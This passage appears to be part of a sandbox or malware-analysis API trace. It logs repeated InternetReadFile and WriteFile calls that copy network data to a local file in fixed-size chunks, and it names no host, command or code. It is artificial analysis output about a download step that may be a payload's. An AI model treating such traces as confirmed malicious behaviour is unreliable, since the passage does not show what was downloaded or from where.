dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.488] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.488] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.489] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.489] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.489] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.490] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.501] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.501] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.503] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.503] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.589] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.589] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.593] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.593] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.594] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.594] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.595] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.595] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.597] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.598] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.603] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.603] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.604] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.604] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.605] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.605] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.605] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.606] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.606] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.606] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.609] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.610] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.690] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.690] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.691] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.691] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.696] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.697] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.697] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.698] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.698] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.699] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.701] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.701] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.702] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.703] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.703] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.704] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.705] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.705] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.705] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.706] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.707] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.708] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.791] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.791] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.792] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.793] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.801] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.802] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.802] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.803] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.803] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.803] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.805] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.805] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.806] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.806] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.806] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.807] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.807] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.807] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.909] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.910] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.910] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.910] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.911] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.911] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.911] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.912] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.912] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.913] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.914] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.915] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.916] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.916] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.917] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.917] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.918] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.918] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.918] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.919] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.919] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.919] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.920] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.920] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0133.014] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0133.015] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0133.015] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0133.015] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0133.016] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0133.016] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, 